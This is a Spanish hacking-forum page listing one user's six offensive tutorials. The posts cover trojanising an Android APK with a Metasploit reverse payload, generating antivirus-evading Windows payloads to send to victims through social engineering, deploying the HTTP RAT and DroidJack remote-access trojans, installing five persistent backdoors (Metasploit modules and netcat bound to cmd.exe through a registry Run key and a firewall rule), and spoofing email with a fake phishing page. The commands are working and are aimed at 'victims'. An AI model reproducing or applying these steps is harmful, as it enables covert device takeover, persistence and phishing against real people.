Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - afravaz

#1
Hacking / Payload en APK
Octubre 02, 2016, 08:56:07 AM
Definición:

Spade es un pequeño pero útil script que permite infectar fácilmente APKs con payloads de Android de Metasploit.
__________________________________________________________________________________________________________________________________________

Requisitos:

    Metasploit
    Python
    Un APK

__________________________________________________________________________________________________________________________________________

Tutorial:

Primero descargaremos una apk la cual queramos bindear con nuestro payload. En este caso se ha escogido CCLEANER.

Segundo descargaremos spade y bindearemos nuestra apk:

git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cd spade/
./spade.py [Ruta APK]

Nos preguntará que payload queremos usar. En este tutorial se ha escogido el 2 (reverse_https).
También nos preguntará la IP LOCAL y el puerto.
Y por último nos preguntará si queremos iniciar un listener con metasploit, le daremos a que si para ahorrarnos tiempo.

Pasaremos la apk a alguien y cuando la inicie nos abrirá una sesión con meterpreter.

__________________________________________________________________________________________________________________________________________

Vídeo:
#2
Hacking / HERCULES: Genera un payload y evade los antivirus
Septiembre 09, 2016, 12:15:34 PM

Definición:

Hercules es una herramienta cuyo proposito es generar un payload fud (Fully Undetectable) que evade antivirus.

Antes de nada:

*POR FAVOR NO SUBAIS EL PAYLOAD A VIRUSTOTAL!, porque dejaría de ser FUD.

Tutorial:

Código: php
./HERCULES_x64 192.168.1.20 4444 –p windows/meterpreter/reverse_tcp –a x64 –l dynamic
"./HERCULES_x64 [IP LOCAL] [PUERTO] –p [PAYLOAD] –a [ARQUITECTURA] –l [LINKER]"

Se nos guardará un payload que tendrá el nombre de Payload.exe el cual enviaremos a nuestra victima mediante cualquier técnica de ingeniería social.
Crearemos un listener TCP con NetCat escribiendo el comando:
Código: php
nc –l –p [PUERTO]

+ Cabe destacar que también podremos poner un listenner de metasploit y ganar así una sesión meterpreter.
*NetCat: Es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Ratio de detección:


Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vídeo:
#3
Hacking / [TOOL] HTTP Rat Backdoor WebServer
Septiembre 07, 2016, 07:11:38 PM

Definición:

HTTP RAT es un tipo de troyano de acceso remoto que utiliza interfaces web y el puerto 80 para obtener acceso. Puede entenderse simplemente como un túnel de HTTP, excepto que funciona en la dirección inversa. Estos troyanos son comparativamente más peligroso ya que estos funcionan en la web y por lo tanto funciona en casi todas partes donde se puede encontrar internet.

Requisitos:

Sistema Operativo Windows (Atacante)
Sistema Operativo Windows (Víctima)

Tutorial:


Abrimos HTTP RAT lo configuramos a nuestro gusto y le damos a create, nos creará un ejecutable.




Pasamos el ejecutable a nuestra víctima y lo ejecutamos, se creará un proceso en background de un servidor.




Ahora ponemos la IP de la víctima en nuestro navegador y veremos esto:




Detección por antivirus:




Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vídeo:

Cualquier duda comentarla. Un saludo.
#4
Hacking / 5 Backdoors Persistentes
Septiembre 06, 2016, 09:22:13 AM

Requisitos:
Sesión meterpreter con permisos elevados (Bypass UAC)
Metasploit
Netcat
Distribución Linux (Atacante)
Windows (Víctima)

Persistencia:
En la sesión meterpreter con permisos elevados:
Citarrun persistence –X –i 10 –p 443 –r [IP]
Código: php
-X= Conectarse cuando el sistema reinicie.
-i 10= Intentar conectarse cada 10 segundos.
-p 443= Puerto de conexión reversa.
-r ip= IP de conexión reversa-

Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
Código: php
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
set LHOST [IP LOCAL]
exploit


s4u_persistence:
Crea una tarea programada que se ejecutará utilizando el servicio para el usuario (S4U). Esto permite que la tarea programada para ejecutarse incluso como un usuario sin privilegios que no se registra en el dispositivo. Esto resultará en contexto de seguridad más bajo, lo que permite el acceso sólo a los recursos locales. El módulo requiere 'Logon as a batch job' permisos (SeBatchLogonRight).
Pondremos en background la sesión meterpreter con bypass uac y:
Código: php
use exploit/windows/local/s4u_persistence
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 443
set trigger logon
set session [Número sesión]
exploit

Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
Código: php
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
exploit


VSS_PERSISTENCE:
Este módulo intentará crear un payload persistente en una nueva instantánea de volumen. Esto se basa en la secuencia de comandos VSSOwn publicado originalmente por Tim Tomes y Mark Baggett. Este módulo ha sido probado con éxito en Windows 7. Con el fin de lograr la persistencia a través de la opción RUNKEY, el usuario debe necesitar una contraseña para iniciar sesión en el equipo atacado.
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
Código: php
use exploit/windows/local/vss_persistence
set runkey true
set schtask true
set RHOST [IP VÍCTIMA]
set session [Número sesión]
exploit

Ahora al ejecutar el exploit se creará un backdoor y una nueva sesión meterpreter.
Ahora al reiniciar el equipo víctima se perderán las sesiones meterpreter, usa el siguiente comando para abrir una nueva:
Código: php
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4444
exploit


REGISTRY PERSISTENCE:
En este módulo se instalará un payload que se ejecutará durante el arranque. Será ejecutado ya sea al iniciar la sesión de usuario o el inicio del sistema mediante el valor de registro en "CurrentVersion \ Run" (dependiendo de privilegio y método seleccionado). El payload se instalará completamente en el primer registro de la sesión fondo meterpreter y luego ejecutar los comandos:
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
Código: php
use exploit/windows/local/registry_persistence
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4545
set startup system
set session [Número de la sesión]
exploit

Ahora al reiniciar el sistema perderemos las sesiones asique usaremos los siguientes comandos para abrir una nueva:
Código: php
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4545
exploit


NETCAT:
Netcat es una utilidad de red ofrecido que lee y escribe datos a través de conexiones de red, utilizando el protocolo TCP / IP.
Después de tener nuestra sesión meterpreter con bypass uac pondremos:
Citarupload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
Ahora vamos a setear el valor del registro:
Citarreg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'
Abrimos una shell con el comando:
Citarshell
Y abriremos el puerto en el firewall:
Citarnetsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445
Para saber que todo está bien configurado pondremos:
Citarnetsh firewall show portopening
Veremos que tenemos la regla de netcat en el firewall.
Una vez reiniciemos el pc víctima, para conectarnos a él usaremos el comando:
Citarnc  -nv [IP VÍCTIMA] [PUERTO/4445]
#5
Hacking / [TOOL] Droidjack: Android Rat
Agosto 30, 2016, 11:18:59 PM

__________________________________________________________________________________________________________________________________________

Definición:
DroidJack es un RAT android que da el poder para establecer el control sobre los dispositivos Android de su víctima con una interfaz sencilla de utilizar y todas las características que necesita para su seguimiento.

__________________________________________________________________________________________________________________________________________

Requisitos:
Windows (Atacante) con Java JRE
Android (Víctima)
Abrir puertos del router (En caso de hacerlo en WAN)
Tener una IP Estática (En caso de hacerlo en WAN)
__________________________________________________________________________________________________________________________________________

Probado en:
Android 4.4.2
Red Local
__________________________________________________________________________________________________________________________________________

Tutorial:
1- Abriremos un cmd y nos dirigimos a la carpeta donde se encuenta el archivo Droidjack.jar para ejecutarlo usaremos el comando:
java -jar Droidjack.jar
Introduciremos el usuario both y la contraseña both
2- Nos vamos a la ventana Generate APK:
App name: Nombre de la aplicación
File name: Nombre del archivo apk
Dynamic DNS: IP a la cual se va a conectar [IP LOCAL o IP PÚBLICA]
Port Number: Puerto
Use Custom icon
Bindear con otra APK



*En Opciones Avanzadas podremos quitar permisos de la aplicación o encriptar el apk.


Una vez configurada la apk a nuestro gusto le daremos a generate, nos creará la apk en la carpeta de Droidjack.
3- Nos vamos a la ventana Devices ahí configuramos el puerto que le pusimos a la apk y le damos aReception On.
4- Pasamos la apk a la víctima, la instalamos y la ejecutamos.


La apk se iniciará al iniciar el teléfono así que siempre tendremos un backdoor persistente.


Detección Antivirus sin encriptar:

__________________________________________________________________________________________________________________________________________

Acuérdate de:
Si lo estas haciendo en WAN y tienes una IP dinámica la persistencia acabará cuando reinicies el router o cambies tú IP.
Si tienes IP estática entonces:
La persistencia durará para siempre en WAN.
La persistencia durará para siempre en LAN, obviamente.
__________________________________________________________________________________________________________________________________________

Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Página oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
__________________________________________________________________________________________________________________________________________

Vídeo:


Post relacionado: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
Hacking / Email Spoofing
Agosto 28, 2016, 07:27:20 PM

Definición:

Email spoofing es la creación de mensajes de correo electrónico con una dirección de remitente falso. Es fácil de hacer porque los protocolos básicos no tienen ningún mecanismo de autenticación. Se puede llevar a cabo desde dentro de una LAN o desde un entorno externo utilizando troyanos. Emails de spam y phishing suelen utilizar este engaño para inducir a error al destinatario sobre el origen del mensaje.

Requisitos:

Postfix –> apt-get install postfix
Mailutils –> apt-get install mailutils

Tutorial:

Iniciamos postfix:
Citar/etc/init.d/postfix start
Clonamos el repositorio sees (A Social Engineering Attack/Audit Tool for Spear Phishing):
Citargit clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Elegir correo a suplantar y a quien se lo envias:
Citarnano sees/config/mail.user

Editar archivo de configuración de sees:
Citarnano sees/config/sees.cfg
(Poner el domino que hemos configurado al instalar postfix)

Editamos lo que vamos a enviar:
Citarnano sees/data/[Podemos enviar texto planto, html, docx, pdf..]

En mi caso enviaré el html.text pero haciéndole unas modificaciones para que quede así:
Código: php
<html>
<body>
<h1><center>Mocosoft te da la bienvenida</center></h1>
<b>Confirmación de registro</b>
<br>
<br>
<p>Haz click en el enlace para activar su cuenta</p>
<a href="192.168.1.130/confirmacion.jpg">ACTIVAR CUENTA</a>
</body>
</html>

El hipervínculo apunta a una foto que tengo en un servidor.

Para enviar el mensaje:
Citar./sees.py – -text – -config_file config/sees.cfg – -mail_user config/mail.user – -html_file data/html.text -v

Ayuda:
–text = No vamos a enviar ningún archivo adjunto
–config_file = Archivo de configuración de sees.
–mail_user = Archivo donde se elige el correo a suplantar
–html_file = Archivo html
-v = Para enviar

Vídeo: